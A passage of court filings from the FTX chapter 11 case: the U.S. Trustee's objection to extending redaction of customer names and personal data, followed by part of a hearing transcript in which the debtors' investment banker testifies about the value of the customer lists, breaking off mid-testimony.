[1]    The last four digits of FTX Trading Ltd.'s and Alameda Research LLC's tax identification numbers are 3288 and 4063, respectively. Due to the large number of debtor entities in these chapter 11 cases, a complete list of the Debtors and the last four digits of their federal tax identification numbers is not provided herein. A complete list of such information may be obtained on the website of the Debtors' proposed claims and noticing agent at https://cases.ra.kroll.com/FTX.

*Statement of Eversheds Sutherland (US) LLP and Morris Nichols, Arsht & Tunnell LLP*

*Pursuant to Bankruptcy Rule 2019 and (II) the Supporting Declaration* [D.I. 1137] (the "Ad Hoc

Committee's Motion," and, collectively with the Joint Motion, the "Motions") and respectfully

states:

## I.      PRELIMINARY STATEMENT

1.      On January 20, 2023, this Court entered the *Final Order (I) Authorizing the*

*Debtors to Maintain a Consolidated List of Creditors in Lieu of Submitting a Separate Matrix for*

*Each Debtor, (II) Authorizing the Debtors to Redact or Withhold Certain Confidential*

*Information of Customers and Personal Information of Individuals on a Final Basis and (III)*

*Granting Certain Related Relief* [D.I. 545] (the "January 20 Redaction Order"), which allowed

the Debtors to redact from all Court filings the names, addresses and email addresses of their

customers, whether natural persons or entities, and also to redact the names, addresses and email

addresses of certain other creditors who are natural persons.  Certain of the provisions of that

order were limited to a 90 day period.  By the Joint Motion, the Debtors and the Committee seek

to extend that period for another 90 days for certain information, and permanently for other

information.  The Ad Hoc Committee, by their motion, seeks authority to redact the names,

addresses and email addresses of the members of the Ad Hoc Committee, who are customers of

FTX.com.

2.      The U.S. Trustee opposes the Motions for the reasons set forth in the *U.S.*

*Trustee's Objection to the Motion of the Debtors for Entry of Interim and Final Orders (I)*

*Authorizing the Debtors to Maintain a Consolidated List of Creditors in Lieu of Submitting a*

*Separate Matrix for Each Debtor, (II) Authorizing the Debtors to Redact or Withhold Certain*

*Confidential Information of Customers and Personal Information of Individuals and (III)*

2

**A0491**

*Granting Certain Related Relief* [D.I. 200] and the *Supplement to the United States Trustee's Objection to the Motion of the Debtors for Entry of Interim and Final Orders (I) Authorizing the Debtors to Maintain a Consolidated List of Creditors in Lieu of Submitting a Separate Matrix for Each Debtor, (II) Authorizing the Debtors to Redact or Withhold Certain Confidential Information of Customers and Personal Information of Individuals and (III) Granting Certain Related Relief* [D.I. 362] (collectively, the "Prior Objections"), which are attached hereto as Exhibits A and B, respectively, and incorporated herein in full.

3.     By this Objection, the U.S. Trustee also sets forth certain additional arguments detailed below.

4.     For the reasons set forth in the U.S. Trustee's Prior Objections, and those set forth below, the Motions should be denied, except as to allow the redaction from public filings of the addresses and e-mail addresses – but not names – of individuals who are customers or other creditors of the Debtors, with unredacted versions of such documents directed to be filed under seal with the Court.

## II.    JURISDICTION, VENUE AND STANDING

4.     Pursuant to (i) 28 U.S.C. § 1334, (ii) applicable order(s) of the United States District Court for the District of Delaware issued pursuant to 28 U.S.C. § 157(a), and (iii) 28 U.S.C. § 157(b)(2)(A), this Court has jurisdiction to hear and determine this Objection.

5.     Under 28 U.S.C. § 586, the U.S. Trustee is charged with overseeing the administration of Chapter 11 cases filed in this judicial district.  This duty is part of the U.S. Trustee's overarching responsibility to enforce the bankruptcy laws as written by Congress and interpreted by the courts.  *See Morgenstern v. Revco D.S., Inc. (In re Revco D.S., Inc.)*, 898 F.2d 498, 500 (6th Cir. 1990) (describing the U.S. Trustee as a "watchdog").

3

**A0492**

6.     Under 11 U.S.C. § 307, the U.S. Trustee has standing to be heard on this

Objection.  *See United States Trustee v. Columbia Gas Sys., Inc. (In re Columbia Gas Sys., Inc.),*

33 F.3d 294, 295-96 (3d Cir. 1994) (noting that U.S. Trustee has "public interest standing" under

11 U.S.C. § 307, which goes beyond mere pecuniary interest).

### III.     <u>FACTUAL BACKGROUND</u>

7.     On November 11, 2022, the Debtors filed voluntary chapter 11 petitions in this

Court.

8.     The Debtors continue to operate their business(es) as debtors in possession

pursuant to 11 U.S.C. §§ 1107 and 1108.

9.     The U.S. Trustee appointed an official committee of unsecured creditors on

December 15, 2022.

10.     On November 19, 2022, the Debtors filed the Motion of Debtors for Entry of

Interim and Final Orders (I) Authorizing the Debtors to Maintain a Consolidated List of

Creditors in Lieu of Submitting a Separate Matrix for Each Debtor, (II) Authorizing the Debtors

to Redact or Withhold Certain Confidential Information of Customers and Personal Information

of Individuals and (III) Granting Certain Related Relief [D.I. 45] (the "<u>Original Motion</u>"),

seeking both interim and final relief.

11.     A hearing on the interim relief sought in the Original Motion took place at the

"first day" hearing on November 22, 2022.  On November 23, 2022, the Court entered an order

granting interim relief on the Motion (the "<u>Interim Order</u>") and set the hearing to consider

approval of final relief for December 16, 2022.  D.I. 157.

12.     On December 12, 2022, the U.S. Trustee filed his objection to the Original

Motion. [D.I. 200, attached hereto as Ex. A.]

**A0493**

13.     On January 1, 2023, the U.S. Trustee filed his supplement to the objection to the Original Motion.  [D.I. 362, attached hereto as Ex. B.] That supplement addressed redactions of (a) the names of parties on the parties in interest list attached to any retention application, and (b) the names of any parties in interest with whom a professional has a connection or otherwise makes a disclosure.

14.     A hearing on the final relief sought by the Original Motion took place on January 11, 2023.  On January 20, 2023, the Court entered the January 20 Redaction Order.  D.I. 545.  That order included authorization for the Debtors to redact from all public filings the following:

(a)     addresses and e-mail addresses of their creditors and equity holders who are natural persons on a permanent basis;[2]

(b)     names, addresses and e-mail addresses of their customers, including those customers who are not natural persons, until the "Redaction Deadline," defined to expire on April 20, 2023; and

(c)     names, addresses and e-mail addresses of any creditors or equity holders who are natural persons and who are protected by the GDPR, until the Redaction Deadline.

*See* January 20 Redaction Order, ¶¶ 4-6.

15.     On March 15, 2023, the Debtors filed their schedules of assets and liabilities (the "Schedules") and statement of financial affairs (the "SOFAs").  The publicly filed versions of those documents included redactions of the names and addresses of both natural persons and entities in various parts of the Schedules and SOFAs, including in the list of insiders who received transfers in the year prior to the bankruptcy filing, and those who received gifts or

---

[2]     The U.S. Trustee did not object to that relief.

charitable contributions.  *See, e.g.*, SOFA of Alameda Research Ltd.,  D.I. 1029 (large payments to insiders with "Name on File" on ecf pages 45 and 46;  gifts or charitable contributions to "Name on File" on ecf pages 47 and 48).  Counsel for the U.S. Trustee was told by counsel to the Debtors that the basis for the redactions was that these persons and entities are customers of the Debtors.

16.     On March 22, 2023, the Ad Hoc Committee Motion was filed.  D.I. 1137. In that motion, the Ad Hoc Committee requested authorization to redact the names, addresses and email addresses of all members of the Ad Hoc Committee, whether they be natural persons or entities, from the Bankruptcy Rule 2019 Statements filed by the Ad Hoc Committee's counsel.  The Ad Hoc Committee Motion also seeks authority to redact portions of a declaration submitted by one of the members of the Ad Hoc Committee in support of the Ad Hoc Committee Motion.

17.     On April 20, 2023, which was 90 days after the Court entered the January 20 Redaction Order, the Debtors and the Committee filed the Joint Motion.

## IV.     <u>ARGUMENT</u>

18.     The U.S. Trustee restates and incorporates the arguments set forth in the Prior Objections attached hereto as Exhibits A and B as if fully set forth herein.

19.     If, however, the Court is inclined to grant the relief requested in the Motions, the U.S. Trustee requests that certain exceptions be made, so that the following information is not authorized to be redacted:

  (a)     <u>Schedules and SOFA</u>:

    (i)     <u>Insiders</u>: The Debtors should not be permitted to redact the names of insiders on their Schedules or SOFAs, including but not limited to the names of insiders that received payments or other transfers from the Debtors within the year

prior to the bankruptcy filing. Nor should the Debtors be permitted to redact the addresses of insiders who are not natural persons on the Schedules and SOFAs, to the extent such information is required by those documents. Disclosures regarding insiders are simply too important to allow such information to be kept from the Debtors' creditors (including the Debtors' non-insider customers) and other parties in interest simply because such insiders happen to be customers of the Debtors.

(ii)    <u>Non-Insiders</u>: The Debtors should not be authorized to redact the names of any non-insider customers who are natural persons, or the names and addresses of any non-insider customers who are not natural persons, in the Schedules and SOFAs if it is not possible to determine from that information that such persons or entities are customers. For example, disclosing on a SOFA the name of an entity that received a charitable contribution from the Debtors does not in any way indicate that such entity is a customer.

(b)    <u>Other Documents - Insiders</u>: The Debtors, the Committee and the Ad Hoc Committee should not be permitted to redact the names of any insider who is a natural person, or the names and addresses of any insider who is not a natural person, on any other document filed with the Court, absent a separate motion seeking approval to redact the same, so that the Court can weigh the importance of public disclosure of information concerning the Debtors' insiders against the Debtors' concern that such disclosure could lead to the poaching of their customers.

(c)    <u>Other Documents – Non-Insiders:</u> Neither the Debtors, the Committee or the Ad Hoc Committee should be permitted to redact the names of any non-insider

7

**A0496**

customers who are natural persons, or the names and addresses of any non-insider

customers who are not natural persons, in Court filings if it is not possible to determine

from the information set forth in the filing that such persons or entities are in fact

customers of the Debtors.

The Request to Redact the Names of Natural Persons Covered by Japanese Privacy Law

20.     In the Joint Motion, the Debtors and the Committee request authority to redact the

names and addresses of customers and other creditors who are natural persons covered by a

Japanese law titled Act on the Protection of Personal Information ("APPI").  The U.S. Trustee

objects to such request on the same grounds it objected to the Debtors' prior request for authority

to redact the names of persons covered by the GDPR of the European Union or the United

Kingdom.  *See* Exhibit A hereto.  The U.S. Trustee further objects to the request regarding those

covered by the Japanese APPI for the following reasons:

(a)     The January 20 Redaction Order allowed redaction of names of natural

persons protected by the GDPR.  There is no mention in that order of the APPI or any

other Japanese law.[3]  It is not clear to the U.S. Trustee whether the Debtors have been

redacting the names of natural persons covered by the APPI even though the January 20

Redaction Order does not provide authority to do so.   If not, then those names have

already been publicly disclosed.

(b)     The Joint Motion has scant information regarding the APPI.  There is only

one paragraph addressing the content of that law, paragraph 43.  No certified translation

---

[3]     The Debtors' Original Motion did not mention Japanese law, although the Debtors' reply on
that motion included a one paragraph argument that paraphrased certain parts of the Japanese
law.  *See* I.D. 407, ¶ 17.

(or any translation) of the law has been provided. In addition, in the Joint Motion, the movants assert that "[w]hile there is a statutory exception for disclosure if it is required by law, this exception does not apply where the applicable law is foreign law (such as U.S. law)." *Id.*, citing the APPI, Art. 27(1)(i). However, because no translation of the statute is provided, that assertion cannot be confirmed. Nor can it be determined if there might be another applicable exception, or whether the Debtors' interpretation of the law is otherwise incorrect or incomplete.

<u>Other Objections to the Proposed Form of Order on the Joint Motion</u>

21.     In addition to the overall objection to the relief sought by the Joint Motion, the U.S. Trustee also objects to the following aspects of the form of order:

(a)     The proposed form of order has two different provisions relating to the redaction of the names of customers who are natural persons. One provision is set forth as part of paragraph 2, and extends the time for which the Debtors and the Committee are authorized to redact the names of all customers – including natural persons – for an additional 90 days from the date of the entry of the order. The other provision is set forth in paragraph 3, and appears to provide authority to redact the names of customers who are natural persons on a permanent basis. If the Court grants the request set forth in the Joint Motion to allow redaction of the names of customers, it should be clear as to the time period the Debtors and the Committee are authorized to redact the names of customers who are natural persons.

(b)     In the January 20 Redaction Order, the Court made an exception to the authority to redact as it concerned the names on the Debtors' Consolidated List of Top 50 Creditors of creditors who are members of the Official Committee of Unsecured

Creditors, and the addresses, email addresses or phone numbers of any creditor who is not a natural person and was appointed to that Committee. D.I. 545, ¶ 10. That exception is not continued in the proposed order on the Joint Motion, as it should be.

The Ad Hoc Committee's Motion

22.     As noted above, in the January 20 Redaction Order, the Court made an exception to the authority to redact as it relates to the creditors on the Official Committee of Unsecured Creditors. If the Court grants the Ad Hoc Committee's Motion, the U.S. Trustee requests that the right of all parties in interest be reserved to request, at a later date, that the names of the members of the Ad Hoc Committee be publicly disclosed, depending on the role the Ad Hoc Committee may take in these cases, including but not limited to any role it may take in negotiating a chapter 11 plan.

23.     The U.S. Trustee leaves the movants to their burden of proof and reserves any and all rights, remedies and obligations to, *inter alia*, complement, supplement, augment, alter and/or modify this Objection, file an appropriate Motion and/or conduct any and all discovery as may be deemed necessary or as may be required and to assert such other grounds as may become apparent upon further factual discovery.

WHEREFORE, the U.S. Trustee respectfully requests that the Court deny the relief requested by the Motions, except to allow the redaction from public filings of the addresses and email addresses – but not names – of individuals who are customers or other creditors of the Debtors, and grant any such other and further relief that the Court deems just and proper.

10

Respectfully Submitted,

**ANDREW R. VARA,**
**UNITED STATES TRUSTEE**
**REGIONS 3 AND 9**

Dated: May 9, 2023

By: _/s/ Juliet Sarkessian_
Juliet Sarkessian, Esq.
Trial Attorney
United States Department of Justice
Office of the United States Trustee
J. Caleb Boggs Federal Building
844 N. King Street, Room 2207, Lockbox 35
Wilmington, DE 19801
(302) 573-6491
Juliet.M.Sarkessian@usdoj.gov

11

**A0500**

```
 1              UNITED STATES BANKRUPTCY COURT
                   DISTRICT OF DELAWARE
 2

 3   IN RE:                   .  Chapter 11
                              .
 4   FTX TRADING LTD., et al., .  Case No. 22-11068 (JTD)
                              .
 5            Debtors.        .  (Jointly Administered)
     . . . . . . . . . . . . . .
 6   AUSTIN ONUSZ, CEDRIC KEES  .
     VAN PUTTEN, NICHOLAS J.    .
 7   MARSHALL AND HAMAD DAR, ON .
     BEHALF OF THEMSELVES AND ALL.
 8   OTHERS SIMILARLY SITUATED,  .
                              .
 9            Plaintiffs,     .
                              .
10                            .
         v.                   .  Adv. Pro. No. 22-50513 (JTD)
11                            .
     WEST REALM SHIRES INC., WEST.
12   REALM SHIRES SERVICES INC. .
     (D/B/A FTX US), FTX TRADING .
13   LTD., ALAMEDA RESEARCH LLC, .
     SAM BANKMAN-FRIED, ZIXIAO  .  Courtroom No.  5
14   WANG, NISHAD SINGH AND     .  844 King Street
     CAROLINE ELLISON,         .  Wilmington, Delaware 19801
15                            .
             Defendants.      .  Thursday, June 8, 2023
16   . . . . . . . . . . . . . .  9:00 a.m.

17                 TRANSCRIPT OF HEARING
           BEFORE THE HONORABLE JOHN T. DORSEY
18            UNITED STATES BANKRUPTCY JUDGE

19   APPEARANCES:

20   For the Debtors:       Adam Landis, Esquire
                            LANDIS RATH & COBB LLP
21                          919 Market Street, Suite 1800
                            Wilmington, Delaware 19801
22

23

24   (APPEARANCES CONTINUED)

25   Audio Operator:        Jermaine Cooper, ECRO
```

```
 1   Transcription Company:   Reliable
                             The Nemours Building
 2                           1007 N. Orange Street, Suite 110
                             Wilmington, Delaware 19801
 3                           Telephone: (302)654-8080
                             Email:  gmatthews@reliable-co.com
 4
     Proceedings recorded by electronic sound recording,
 5   transcript produced by transcription service.

 6   _____

 7
     APPEARANCES (CONTINUED):
 8
     For the Debtors:        Andrew Dietderich, Esquire
 9                           Brian Glueckstein, Esquire
                             SULLIVAN & CROMWELL LLP
10                           125 Broad Street
                             New York, New York 10004
11
     For JPLs:               Christopher Shore, Esquire
12                           WHITE & CASE LLP
                             1221 6th Avenue
13                           New York, New York 10020

14                           Jason Zakia, Esquire
                             WHITE & CASE LLP
15                           111 South Wacker Drive
                             Suite 5100
16                           Chicago, Illinois 60606

17   For the U.S. Trustee:   Juliet Sarkessian, Esquire
                             OFFICE OF THE UNITED STATES TRUSTEE
18                           844 King Street, Suite 2207
                             Lockbox 35
19                           Wilmington, Delaware 19801

20   For the Ad Hoc
     Committee of
21   Customers and
     Creditors of FTX:       Jeffrey Sabin, Esquire
22                           VENABLE LLP
                             151 West 42nd Street
23                           48th Floor
                             New York, New York 10036
24

25
```

**A0502**

```
 1   APPEARANCES CONTINUED:

 2   For the Official
     Committee of
 3   Unsecured Creditors:      Kenneth Pasquale, Esquire
                               PAUL HASTINGS LLP
 4                             200 Park Avenue
                               New York, New York 10166
 5
     For Bloomberg L.P.:       David Finger, Esquire
 6                             FINGER & SLANINA, LLC
                               One Commerce Center
 7                             1201 N. Orange Street
                               7th Floor
 8                             Wilmington, Delaware 19801

 9                             KatieLynn Townsend, Esquire
                               REPORTERS COMMITTEE FOR
10                               FREEDOM OF THE PRESS
                               1156 15th Street NW
11                             Suite 1020
                               Washington, DC 20005
12
     For the Ad Hoc
13   Committee of Non-US
     Customers of FTX:         David Wender, Esquire
14                             EVERSHEDS SUTHERLAND
                               999 Peachtree Street, NE
15                             Suite 2300
                               Atlanta, Georgia 30309
16

17

18

19

20

21

22

23

24

25
```

**A0503**

1                              INDEX

2   MOTION:                                                PAGE

3
    Agenda
4   Item 4:   Motion of Debtors for Entry of an Order       7
              Authorizing Implementation of a Key
5             Employee Incentive Plan
              [D.I. 1359, filed on April 26, 2023
6

7   Agenda
    Item 10:  Motion of Debtors for Entry of an Order
8             (A) Authorizing the Debtors to File
              Certain Information Contained in Exhibits
9             A and A-1 to the Revised Order Authorizing
              Implementation of a Key Employee Incentive
10            Plan Under Seal and (B) Granting Related
              Relief [D.I. 1561, filed on June 2, 2023]
11
              Court's Ruling:                                7
12

13  Agenda
    Item 8:   Motion of the Joint Provisional Liquidators    8
14            for a Determination that the U.S. Debtors'
              Automatic Stay Does Not Apply to, or in the
15            Alternative for Relief from Stay for Filing
              of the Application in the Supreme Court of
16            the Commonwealth of the Bahamas Seeking
              Resolution of Non-US Law and Other Issues
17            [D.I. 1192, filed on March 29, 2023]

18            Court's Ruling:                              137

19  Agenda
    Item 9:   Joint Motion of the Debtors and the Official  138
20            Committee of Unsecured Creditors for an
              Order Authorizing the Movants to Redact or
21            Withhold Certain Confidential Information of
              Customers and Personal Information of
22            Individuals
              [D.I. 1324, filed on April 20, 2023]
23
              Court's Ruling:
24

25

A0504

1    Honor?

2              THE COURT:  Sure.

3         (Pause)

4              MR. LANDIS:  Your Honor, for the record, Adam

5    Landis, on behalf of FTX Trading, Ltd.  We'd like to try to

6    get as far as we can on an evidentiary basis on the sealing

7    motions if Your Honor is inclined to let us push through.

8              THE COURT:  Let's go.

9              MR. LANDIS:  Thank you.

10             THE COURT:  All right.

11             MR. GLUECKSTEIN:  Thank you, Your Honor.  Again,

12   for the record, Brian Glueckstein of Sullivan & Cromwell.

13             The next motion, as Mr. Landis indicated, is the

14   joint motion of the debtors and the Committee for an order

15   authorizing redaction of certain confidential information of

16   customers and individuals.

17             We do have -- the parties jointly have two

18   witnesses with respect to this motion:  Mr. Cofsky, the

19   debtors' investment banker who testified on these issues

20   before the Court previously, and Mr. Sheridan.

21             We, as the debtors, would like to call Kevin

22   Cofsky to the stand as the first witness.

23             THE COURT:  All right.  Mr. Cofsky?

24             UNIDENTIFIED SPEAKER:  (Indiscernible.)

25             MR. WENDER:  Sorry, Your Honor.  For the record,

 1  David Wender with Eversheds, counsel for the Ad Hoc

 2  Committee.

 3          And because the motion seeks similar relief, I

 4  thought the understanding was, at least, we'd rely on the

 5  same evidence and present supplemental argument with respect

 6  to the Ad Hoc Committee's motion, as well.

 7          MR. GLUECKSTEIN:  Yeah.  I'm sorry, Your Honor.

 8          I mean, the Ad Hoc motion is obviously related and

 9  so, we did think it made sense to, at least have the Court

10  consider the evidentiary basis and arguments together.

11          THE COURT:  That's fine.

12          MR. WENDER:  Thank you, Mr. Glueckstein.

13          MR. PASQUALE:  Your Honor, if I may?

14          THE COURT:  Yeah.

15          MR. PASQUALE:  Ken Pasquale, again, from Paul

16  Hastings, for the Committee.

17          One thing just so Your Honor is aware of how we

18  planned to split responsibilities on the joint motion, is the

19  debtors will be responsible for the 107(b) presentation and

20  argument and the Committee will be handling the 107(c).

21          THE COURT:  Okay.  Thank you.

22          THE CLERK:  Please raise your right hand.

23          Please state in full, your full name, and spell

24  your last name for the court record, please.

25          MR. COFSKY:  Kevin Michael Cofsky, C-o-f-s-k-y.

```
1              KEVIN M. COFSKY, DEBTORS' WITNESS, AFFIRMED

2                 THE WITNESS:  I do.

3                 THE CLERK:  You may be seated.

4                 Your Honor?

5                     DIRECT EXAMINATION

6  BY MR. GLUECKSTEIN:

7  Q    Good afternoon, Mr. Cofsky.

8  A    Good afternoon.

9  Q    Mr. Cofsky, can you please provide the Court, as a

10 reminder, with your background and experience.  Please, if

11 you would.

12 A    Yes.  I'm a partner at Perella Weinberg Partners.  I

13 was a graduate from The Wharton School in 1992.  I was an

14 analyst at Houlihan Lokey in the restructuring area for two

15 years before I went to the University of Pennsylvania Law

16 School and the University of Pennsylvania Fels Institute of

17 Government.

18      I practiced law for several years, clerking, as well as

19 a corporate lawyer, Cravath, Swaine & Moore, and then

20 returned to banking and have been focused in the

21 restructuring area since approximately 2001.  And I've been a

22 partner at Perella -- I've been at Perella since 2007 and

23 I've been a partner since 2015.

24 Q    Mr. Cofsky, can you please describe, briefly, for the

25 Court, the scope of work that yourself and your colleagues at
```

**A0507**

 1  Perella Weinberg Partners have being doing, pursuant to your

 2  retention in these Chapter 11 cases for the debtors.

 3  A    Yes, Perella Weinberg Partners is acting as an

 4  investment banker to the debtors in this matter.  A

 5  number of wide-ranging areas, including the exploration of

 6  the monetization of various assets, as well as working with

 7  the other professionals and the management team and the Board

 8  and the other stakeholders to evaluate a potential plan of

 9  reorganization and the ultimate exit of the Chapter 11 cases.

10  Q    Can you please describe, briefly, your experience in

11  terms of monetization of businesses, including with respect

12  to customer lists over the course of your career.

13  A    Yes, I think we dealt with this in my prior testimony

14  in my declaration.  I have represented a number of companies

15  and businesses with respect to 363 sales and plan of

16  reorganization sales, a number of which involved customers.

17       And as I testified previously and was in my original

18  declaration, my understanding and belief is that the

19  customers have, in this case, material value to the estate.

20       The identities and the lists of those customers and the

21  ability of other competitors to gain knowledge of those

22  customers would be detrimental to the estate.

23            MS. SARKESSIAN:  I'm sorry, can I ask the witness

24  to speak up or maybe bring the microphone a little closer.

25            THE WITNESS:  Yeah, I'm sorry.  I can do that.

1        MS. SARKESSIAN:  I'm just having a little trouble

2   hearing you.

3        THE WITNESS:  Is that better?

4        MS. SARKESSIAN:  Yes.  Oh, much better.  Thank

5   you.

6   BY MR. GLUECKSTEIN:

7   Q    Mr. Cofsky, can you elaborate a bit and explain to the

8   Court your view today, as you sit here today, as to whether

9   you believe there's value in the FTX debtors' customer lists.

10  A    I do.  As I indicated earlier, part of the work that

11  Perella Weinberg Partners is undertaking is an evaluation of

12  the potential to monetize or reorganize the assets of the

13  estate, including the exchange.  The estate has approximately

14  nine million customers and as we evaluate the potential for

15  the treatment of that exchange going forward, we believe that

16  the existing customer base is extraordinarily valuable and

17  we -- our understanding is based on our research and having

18  looked at the costs incurred by other crypto companies,

19  specifically, to solicit customers.

20        We have also already engaged in a significant outreach

21  process, with respect to solicitation of third-party

22  interests in participating in a process to either acquire,

23  invest into, or reorganize the FTX Exchange.  And based on

24  those conversations, again, it's our understanding that the

25  existing customers are extremely valuable and valued by folks

 1  who would be interested in investing into a reorganized

 2  business.

 3  Q    Mr. Cofsky, do you have a view on whether the debtors'

 4  customers lists are a potential source of value in a

 5  situation where the debtors reorganize versus sell the

 6  exchange?

 7  A    I think that the existing customers in that list is

 8  valuable in both contexts.  To the extent the business would

 9  be reorganized, those customers would likely be very

10  interested if they're going to own a portion or a significant

11  portion of the reorganized business, they would be very

12  interested in trading on that exchange to generate

13  incremental equity value, enterprise value for their new

14  holdings of that.

15       Similarly, if the estate monetizes or seeks an

16  investment from third parties into the exchange, that same

17  value would ultimately inure to the benefit of those

18  customers.

19  Q    Do you view the debtors' customers lists as potentially

20  having value on an independent basis?

21  A    I do.  Again, as we have seen in --

22            MS. SARKESSIAN:  Sorry, I'm going to object, just

23  because I don't understand what "independent basis" means.

24            MR. GLUECKSTEIN:  I'm happy to restate the

25  question.

1   BY MR. GLUECKSTEIN:

2   Q      Mr. Cofsky, do you have a view as to whether you might

3   be able, as the debtors' investment banker, to monetize the

4   customer list itself and create value for the estate?

5   A      Yes.  So, I understand the question to be, you've asked

6   me if I think that the identities of the customers and the

7   customer lists would be valuable to the business if it's

8   reorganized and the business by third parties if it is sold

9   or otherwise seeks a third-party investment.

10         I take this question to mean, would the list be

11  valuable if we were unable to sell or chose not to sell

12  and/or were unable or chose not to reorganize, but simply to

13  sell the customer lists.  And I do believe that would be

14  valuable and the basis for that belief is the conversations

15  we've had initially with third parties.

16  Q      You testified on these issues before this Court back in

17  January, with respect to the same questions around sealing

18  the customer lists; do you recall that?

19  A      I recall that, yes.

20  Q      And do you recall, at the time, back in January, you

21  offered testimony to the Court around the question of whether

22  disclosure of the customer lists would jeopardize the

23  debtors' ability to maximize value; do you recall that?

24  A      I do.

25  Q      As you sit here today, do you have a view today as to

**A0511**

1   whether the immediate disclosure of the debtors' customer

2   lists would jeopardize the debtors' ability to maximize

3   value?

4   A      I do.  I believe that releasing that information --

5   that information is valuable, as I said, and I think

6   releasing that information would impair the debtors' ability

7   to maximize the value that it currently possesses.

8   Q      Mr. Cofsky, could you please provide information for

9   the Court as to what you and your team have been doing since

10  January in order to try to begin to realize the value from

11  the customer lists.

12  A      Yes, as I indicated, we have spent considerable time

13  working with the debtors' other professionals, the UCC

14  professionals to evaluate the potential for a reorganization

15  of the exchange, the core exchange, as well as the potential

16  to seek third-party investment into that or to sell that

17  exchange.

18         And as I indicated, we have reached out to a

19  significant number of third parties and have begun the

20  process of discussions with respect to that evaluation

21  process with those third parties.

22  Q      And can you just clarify, when you say the "core

23  exchange," what you're referring to there.

24  A      The international exchange, although, we have also

25  evaluated the U.S. exchange and the potential for that to be

1  reorganized or not.

2  Q     In your view, is there still work remaining to be done,

3  with respect to realizing the future, if any, of the FTX.com

4  Exchange?

5  A     Yes.  There is still significant work to be done.  As I

6  indicated, we have been working hard to evaluate and seek to

7  implement the potential to reorganize that exchange, but

8  there's a lot of work that would need to be done in order to

9  accomplish that; in addition, as I indicated earlier, we have

10 begun the process of discussions with third parties, but

11 we're in the early stages of that process and that will take

12 some time.

13 Q     As you sit here today, do you have any sense as to,

14 generally, how long it might take to complete that process?

15 A     The process may -- it's a great question.  I don't have

16 specificity for you.  The process is uncertain, insofar as

17 we're relying on third-party participation to understand the

18 interest in acquiring or investing into the rehabilitation of

19 that core exchange.

20      We are also, potentially, going to implement that

21 reorganization through a 363 sale or through a plan of

22 reorganization.  So in many ways, the ultimate outcome may be

23 tied to the outcome of this case and it's difficult to

24 determine with specificity exactly when that might be.

25 Q     What is your view with respect to your ongoing process

**A0513**

1  from the immediate disclosure of the debtors' customer lists,

2  if any?

3  A     Can you repeat that question, please?

4  Q     Sure, let me rephrase the question.

5        Do you have a view as to whether your current process

6  would be impacted by the immediate disclosure of the debtors'

7  customer lists?

8  A     Yes, I think it would be negatively impacted,

9  potentially significantly.

10  Q     Mr. Cofsky, in connection with your ongoing analysis,

11  has your -- have you and your team formed a view as to

12  whether competitors would be able to locate and contact the

13  debtors' customers, if only their names were publicly

14  disclosed?

15  A     We have.  I testified briefly on this -- excuse me --

16  in my last testimony.

17        We've gone out and we've looked at the top-200

18  customers to validate what I had testified, with respect to a

19  smaller number of customers.  And with that --

20              MS. SARKESSIAN:  I'm going to object.  Based on

21  his prior testimony, I understand this was not personally

22  done by the witness, so maybe he could clarify to what extent

23  he did this work personally.

24              THE COURT:  Do you want to establish a foundation.

25  BY MR. GLUECKSTEIN:

**A0514**

1    Q      Mr. Cofsky, okay, let's back up a half step.

2           Can you describe your development in the work that

3    you're beginning to talk about with respect to the analysis

4    of customer names in preparation of your testimony.

5    A      Yes.  I personally looked at the spreadsheet that

6    included all of the names and I directed my team to do the

7    research to determine the extent to which they would be able

8    to identify customers on that list, based solely on the

9    customer names.  And I discussed -- it was an iterative

10   process and we talked about the methodology to do that.  And

11   we talked about what information was located and whether that

12   ultimately could be deemed to be an identification or a

13   highly likely identification or something else.

14   Q      Did you --

15             MS. SARKESSIAN:  I would object to any testimony,

16   based on what any other person told this witness and not what

17   he, himself -- if he did the research, it sounds like he did

18   not.  So I object to any testimony that's based upon

19   information that was given to him by another person.

20             MR. GLUECKSTEIN:  Your Honor, I believe Mr. Cofsky

21   should be able to testify with respect to work that was done

22   at his direction, that he was involved with and reviewed as

23   far as the outputs of, and he's prepared to testify about.

24             THE COURT:  I'll overrule the objection.

25             MR. GLUECKSTEIN:  Thank you, Your Honor.

1   BY MR. GLUECKSTEIN:

2   Q    So, Mr. Cofsky, you were talking, you said in

3   furtherance to the discussion that in the testimony you

4   provided in January, you, subsequent to that, commissioned

5   and participated in an analysis of the debtors' top-200

6   customers, correct?

7   A    That's correct.

8        I'm sorry, would you mind if I get some water, please?

9   Q    Oh, sure.  Sure.  Hold on one moment.

10       (Pause)

11            THE COURT:  I never saw such a flurry of activity.

12       (Laughter)

13            MR. GLUECKSTEIN:  There's a lot of people standing

14   at their ready to assist.

15       (Pause)

16            MS. SARKESSIAN:  Can I have the question repeated,

17   because I didn't hear how many customers it was.

18   BY MR. GLUECKSTEIN:

19   Q    Mr. Cofsky, you could please explain for the Court the

20   scope of the analysis that you commissioned with your team on

21   the topic of whether revelation of customer names would be

22   enough for competitors to locate those customers.

23   A    Yes, we looked at the top-200 customers, which I

24   recognize is a subset of the nine million potential

25   customers.  Based on the dollar amount of the claims at

1   petition date, that would represent approximately 2.4 billion

2   of claims, which we thought was a reasonable set of customer

3   names to review.

4   Q    And can you describe for the Court both, the analysis

5   that you did and the findings of that analysis.

6   A    Yes, we did an analysis by looking through Google, but

7   looking through LinkedIn, and by looking through Twitter

8   feeds.  This is not our core area of expertise.  I actually

9   believe that a well-funded and persistent party might be able

10  to gain more confidence, but we wanted to be reasonable with

11  our time.

12       And the results were, we thought, were compelling.  And

13  the results were that with respect to -- we looked at this

14  from a -- I can describe it on a percentage basis, as well as

15  a dollar number of claims, but the percent of the 200

16  customers that we were able to identify purely on the basis

17  of names, that was approximately 46 percent.  34 percent of

18  those we deemed to be highly likely that we had identified

19  them.  The additional 12 percent, we viewed as likely, but

20  not 100-percent certain.

21       On a dollar basis, we were able to locate in excess of

22  a billion dollars of those claims, which represented, I

23  believe, 30 -- I'm sorry, 42 percent of the 200, the total of

24  $2.4 billion.  That's the greater than a billion dollars of

25  located claims.

**A0517**

1  Q     Mr. Cofsky, the debtors also have customers on their

2  customer lists who, as of the petition date, had a zero-

3  dollar balance, correct?

4  A     Yes.

5  Q     Do you have a view as to whether customers who had a

6  zero-dollar balance on the petition date, would still be

7  valuable names, if publicly revealed?

8  A     Yes, I do.  Our analysis did not go back to determine

9  the extent to which those customers withdrew significant

10 funds prior to the filing.  Our analysis, and what I

11 summarized, related solely to the value of those claims at

12 the petition date.  Obviously, another workstream will be the

13 determination of whether there are preference actions or not,

